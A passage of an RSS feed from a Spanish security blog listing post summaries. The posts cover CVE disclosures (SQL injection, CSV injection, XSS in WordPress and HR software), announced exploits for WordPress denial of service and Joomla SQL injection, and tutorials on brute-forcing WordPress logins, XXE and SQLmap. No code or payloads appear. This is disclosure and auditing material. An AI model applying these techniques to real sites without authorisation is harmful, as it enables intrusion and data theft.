&lt;p&gt;Jorani es un sistema de administración de licencias desarrollado en PHP / MySQL bajo una licencia AGPL v3, está diseñado para proporcionar solicitud de flujos de trabajo simples y tiempo extra para organizaciones pequeñas.&lt;/p&gt;</description></item><item><title>CVE-2018-15873 Sentrifugo HRMS 3.2 - Blind SQL Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/</link><pubDate>Sun, 26 Aug 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/</guid><description>&lt;p&gt;Esta entrada tiene como objetivo hacer pública la vulnerabilidad &lt;a href="https://www.owasp.org/index.php/Blind_SQL_Injection" target="_blank" rel="noopener noreferrer"&gt;Blind SQL Injection&lt;/a&gt;
 descubierta en el software &lt;a href="http://www.sentrifugo.com/download" target="_blank" rel="noopener noreferrer"&gt;Sentrifugo HRMS 3.2&lt;/a&gt;
, la vulnerabilidad ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15873" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15873&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="sentrifugo-hrms-32---cve-2018-15873"&gt;Sentrifugo HRMS 3.2 - CVE-2018-15873&lt;/h2&gt;
&lt;h3 id="blind-sql-injection"&gt;Blind SQL Injection&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection_001.webp" alt="CVE-2018-15873 Sentrifugo HRMS 3.2 - Blind SQL Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Sentrifugo es un software open source que facilita la &lt;strong&gt;administración de recursos humanos&lt;/strong&gt; en las organizaciones. Está &lt;strong&gt;repleto de módulos&lt;/strong&gt; esenciales como evaluación, gestión del tiempo, gestión de licencias, gestión de empleados, análisis, contratación, verificación de antecedentes, servicio técnico y mucho más. Permite a los empleados &lt;strong&gt;contribuir de manera efectiva y productiva&lt;/strong&gt; a los objetivos de la organización.&lt;/p&gt;</description></item><item><title>CVE-2018-15571 WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection</title><link>https://hackpuntes.com/es/posts/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/</link><pubDate>Fri, 24 Aug 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/</guid><description>&lt;p&gt;Buenas a todos de nuevo, volviendo de las vacaciones 🏖️, &lt;a href="https://cve.mitre.org/" target="_blank" rel="noopener noreferrer"&gt;MITRE&lt;/a&gt;
 me ha asignado otro CVE para plugins &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, esta vez, he descubierto una vulnerabilidad de ejecución remota de código a través de &lt;a href="https://www.owasp.org/index.php/CSV_Injection" target="_blank" rel="noopener noreferrer"&gt;inyección CSV&lt;/a&gt;
 en el plugin &lt;a href="https://wordpress.org/plugins/export-users-to-csv/" target="_blank" rel="noopener noreferrer"&gt;Export Users to CSV - 1.1.1&lt;/a&gt;
, desarrollado por &lt;a href="https://www.mattcromwell.com/products/export-users-to-csv" target="_blank" rel="noopener noreferrer"&gt;Matt Cromwell&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada, no ha sido reconocida por el autor y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15571" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-15571&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-15571"&gt;WordPress Plugin CVE-2018-15571&lt;/h2&gt;
&lt;h3 id="export-users-to-csv---111---inyección-csv"&gt;Export Users to CSV - 1.1.1 - Inyección CSV&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection/cve-2018-15571-wordpress-plugin-export-users-to-csv-1-1-1-csv-injection_001.webp" alt="CVE-2018-15571 WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-14430 WordPress Plugin Multi Step Form &lt;= 1.2.5 - Múltiples Cross Site Scripting Reflejados</title><link>https://hackpuntes.com/es/posts/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/</link><pubDate>Sat, 21 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/</guid><description>&lt;p&gt;Durante otra de mis auditorias a plugins para &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, he descubierto varias vulnerabilidades del tipo &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross Site Scripting Reflejado (XSS)&lt;/a&gt;
 en el plugin &lt;a href="https://es.wordpress.org/plugins/multi-step-form/" target="_blank" rel="noopener noreferrer"&gt;Multi Step Form &amp;lt;= 1.2.5&lt;/a&gt;
, desarrollado por &lt;a href="https://mondula.com/" target="_blank" rel="noopener noreferrer"&gt;Mondula GmbH&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14430" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-14430&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-14430"&gt;WordPress Plugin CVE-2018-14430&lt;/h2&gt;
&lt;h3 id="multi-step-form--125--múltiples-cross-site-scripting-reflejados"&gt;Multi Step Form &amp;lt;= 1.2.5 – Múltiples Cross Site Scripting Reflejados&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados/cve-2018-14430-wordpress-plugin-multi-step-form-125-multiples-xss-reflejados_001.webp" alt="CVE-2018-14430 WordPress Plugin Multi Step Form &amp;lt;= 1.2.5 - Múltiples Cross Site Scripting Reflejados" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2018-13832 WordPress Plugin All In One Favicon &lt;= 4.6 - Autenticado Múltiples Cross Site Scripting Persistentes</title><link>https://hackpuntes.com/es/posts/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/</link><pubDate>Tue, 10 Jul 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/</guid><description>&lt;p&gt;Durante una de mis auditorias a plugins para &lt;a href="https://es.wordpress.org/" target="_blank" rel="noopener noreferrer"&gt;WordPress&lt;/a&gt;
, he descubierto varias vulnerabilidades del tipo &lt;a href="https://www.owasp.org/index.php/Cross-site_Scripting_%5c%28XSS%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross Site Scripting Persintente (XSS)&lt;/a&gt;
 en el plugin &lt;a href="https://wordpress.org/plugins/all-in-one-favicon/" target="_blank" rel="noopener noreferrer"&gt;All In One Favicon &amp;lt;= 4.6&lt;/a&gt;
, desarrollado por &lt;a href="http://www.techotronic.de/" target="_blank" rel="noopener noreferrer"&gt;Arne Franken de Techotronic&lt;/a&gt;
. Esta vulnerabilidad ya fue reportada y ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13832" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-13832&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="wordpress-plugin-cve-2018-13832"&gt;WordPress Plugin CVE-2018-13832&lt;/h2&gt;
&lt;h3 id="all-in-one-favicon--46--autenticado-múltiples-cross-site-scripting-persistentes"&gt;All In One Favicon &amp;lt;= 4.6 – Autenticado Múltiples Cross Site Scripting Persistentes&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss/cve-2018-13832-wp-plugin-all-in-one-favicon-4-6-autenticado-multiples-xss_001.webp" alt="CVE-2018-13832 WordPress Plugin All In One Favicon &amp;lt;= 4.6 - Autenticado Múltiples Cross Site Scripting Persistentes" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Enumerar usuarios y realizar ataques de fuerza bruta en WordPress con Burp Suite</title><link>https://hackpuntes.com/es/posts/enumerar-usuarios-y-realizar-ataques-de-fuerza-bruta-en-wordpress-con-burp-suite/</link><pubDate>Wed, 20 Jun 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/enumerar-usuarios-y-realizar-ataques-de-fuerza-bruta-en-wordpress-con-burp-suite/</guid><description>&lt;p&gt;En esta entrada vamos a ver como 👤 &lt;strong&gt;enumerar usuarios y realizar ataques de fuerza bruta&lt;/strong&gt; para intentar acceder al panel de administración de un sitio web desarrollado con el CMS (Gestor de contenido) WordPress, para realizar este ataque, haremos uso de la herramienta 🛠 &lt;a href="https://portswigger.net/burp" target="_blank" rel="noopener noreferrer"&gt;Burp Suite.&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Existen varios scripts e incluso herramientas como 🛠 &lt;a href="https://wpscan.org/" target="_blank" rel="noopener noreferrer"&gt;WPScan&lt;/a&gt;
 para realizar enumeración de usuarios y ataques por fuerza bruta, el inconveniente de estas herramientas, es que pueden realizar pruebas activas contra el sitio web que no deseamos realizar.&lt;/p&gt;</description></item><item><title>Exploit CVE-2018-6389 - WordPress Core - Denial of Service</title><link>https://hackpuntes.com/es/posts/exploit-cve-2018-6389-wordpress-core-denial-of-service/</link><pubDate>Thu, 08 Mar 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploit-cve-2018-6389-wordpress-core-denial-of-service/</guid><description>&lt;p&gt;Últimamente estoy muy atento de las vulnerabilidades de los CMS y vengo a compartir con vosotros otro exploit que he desarrollado para la vulnerabilidad &lt;a href="https://www.certsi.es/alerta-temprana/vulnerabilidades/cve-2018-6389" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6389&lt;/a&gt;
. Esta vulnerabilidad descubierta por &lt;a href="http://baraktawily.blogspot.com.es/" target="_blank" rel="noopener noreferrer"&gt;Barak Tawily&lt;/a&gt;
, permite lanzar un &lt;a href="https://es.wikipedia.org/wiki/Ataque_de_denegaci%C3%B3n_de_servicio" target="_blank" rel="noopener noreferrer"&gt;ataque de denegación de servicio (DOS)&lt;/a&gt;
 sobre las páginas webs desarrolladas con WordPress (se estima que &lt;strong&gt;aproximadamente el 29% de todas las webs que existen actualmente&lt;/strong&gt; en el mundo están desarrolladas con este framework).&lt;/p&gt;</description></item><item><title>Exploit CVE-2018-6396 - Joomla Google Map Landkarten SQL Injection</title><link>https://hackpuntes.com/es/posts/exploit-cve-2018-6396-joomla-google-map-landkarten-sql-injection/</link><pubDate>Sun, 04 Mar 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploit-cve-2018-6396-joomla-google-map-landkarten-sql-injection/</guid><description>&lt;p&gt;Hoy quería compartir con vosotros un &lt;a href="https://es.wikipedia.org/wiki/Exploit" target="_blank" rel="noopener noreferrer"&gt;exploit&lt;/a&gt;
 que he desarrollado en Python para explotar una vulnerabilidad SQLi descubierta por &lt;a href="https://twitter.com/ihsansencan" target="_blank" rel="noopener noreferrer"&gt;Ihsan Sencan&lt;/a&gt;
 en el componente &lt;a href="https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/" target="_blank" rel="noopener noreferrer"&gt;Google Map Landkarten&lt;/a&gt;
, esta vulnerabilidad tiene asociado el &lt;a href="https://www.certsi.es/en/early-warning/vulnerabilities/cve-2018-6396" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6396.&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="joomla-cve-2018-6396"&gt;Joomla CVE-2018-6396&lt;/h2&gt;
&lt;h3 id="joomla-component-google-map-landkarten--423--sql-injection"&gt;Joomla! Component Google Map Landkarten &amp;lt;= 4.2.3 – SQL Injection&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por &lt;a href="https://www.exploit-db.com/exploits/44113/" target="_blank" rel="noopener noreferrer"&gt;Ihsan Sencan&lt;/a&gt;
 el &lt;strong&gt;16/02/2018&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;💣 Exploit desarrollado por &lt;a href="https://twitter.com/JJavierOlmedo" target="_blank" rel="noopener noreferrer"&gt;Javier Olmedo&lt;/a&gt;
 el &lt;strong&gt;03/03/2018&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://www.certsi.es/en/early-warning/vulnerabilities/cve-2018-6396" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-6396&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software  &lt;a href="https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/google-map-landkarten/" target="_blank" rel="noopener noreferrer"&gt;Google Map Landkarten&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable &amp;lt;= &lt;strong&gt;4.2.3&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="cómo-usar-este-exploit"&gt;¿Cómo usar este exploit?&lt;/h3&gt;
&lt;p&gt;En primer lugar, &lt;strong&gt;usa este exploit únicamente sobre sitios web administrados por ti o en los cuales tengas consentimiento&lt;/strong&gt; para realizar está comprobación, en mi caso, me he creado una web con &lt;a href="https://downloads.joomla.org/es/" target="_blank" rel="noopener noreferrer"&gt;Joomla 3.8.5&lt;/a&gt;
 en mi máquina local.&lt;/p&gt;</description></item><item><title>WordPress Exploit FrameWork (WPXF) - Instalación, comandos y uso con ejemplo de explotación</title><link>https://hackpuntes.com/es/posts/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/</link><pubDate>Fri, 05 Jan 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion/wpxf-instalacion-comandos-y-uso-con-ejemplo-de-explotacion_banner.webp" alt="WordPress Exploit FrameWork (WPXF) - Instalación, comandos y uso con ejemplo de explotación" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;WordPress Exploit FrameWork es una herramienta que sirve de ayuda a los auditores de aplicaciones web a la hora realizar &lt;strong&gt;pruebas de seguridad sobre sitios webs basados en el conocido gestor de contenidos (CMS) WordPress&lt;/strong&gt;, está desarrollado en Ruby y está orientado al uso y desarrollo de módulos, exploits y payloads, algo similar al conocido Metasploit.&lt;/p&gt;</description></item><item><title>XXE - XML External Entity - El Nuevo SQLi</title><link>https://hackpuntes.com/es/posts/xxe-xml-external-entity-el-nuevo-sqli/</link><pubDate>Sat, 30 May 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/xxe-xml-external-entity-el-nuevo-sqli/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/xxe-xml-external-entity-el-nuevo-sqli/xxe-xml-external-entity-el-nuevo-sqli_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/xxe-xml-external-entity-el-nuevo-sqli/xxe-xml-external-entity-el-nuevo-sqli_banner.webp" alt="XXE - XML External Entity - El Nuevo SQLi" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;XXE (Xml eXternal Entity)&lt;/strong&gt; es un tipo de vulnerabilidad que se produce en aplicaciones que hacen uso de &lt;strong&gt;«parsers»&lt;/strong&gt; XML. Es decir aplicaciones que reciben como entrada un documento XML y para procesarlo hacen uso de alguna librería de parseo como LibXML, Xerces, MiniDOM, SAX etc. El atacante entonces puede aprovechar esta vulnerabilidad y enviar un documento XML especialmente manipulado para conseguir que el parser XML divulgue información del sistema, consuma recursos en exceso, ejecute comandos u otras formas de explotación.&lt;/p&gt;</description></item><item><title>Ataques SQL injection contra Bases de Datos mediante SQLmap</title><link>https://hackpuntes.com/es/posts/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/</link><pubDate>Wed, 11 Mar 2015 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap/ataques-sql-injection-contra-bases-de-datos-mediante-sqlmap_banner.webp" alt="Ataques SQL injection contra Bases de Datos mediante SQLmap" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hoy en día, uno de los ataques que &lt;strong&gt;más se utiliza&lt;/strong&gt; contra aplicaciones web son los llamados &lt;strong&gt;SQL Injection,&lt;/strong&gt; estos ataques tienen como &lt;strong&gt;objetivo&lt;/strong&gt; acceder a la base de datos del sitio web, y &lt;strong&gt;obtener información sensible&lt;/strong&gt; sobre ella, como por ejemplo los &lt;strong&gt;datos para administrar el sitio web, contraseñas de los usuarios, correos electrónicos, DNI, dirección e incluso números de tarjetas de crédito con los códigos de verificación, etc.&lt;/strong&gt;&lt;/p&gt;</description></item></channel></rss>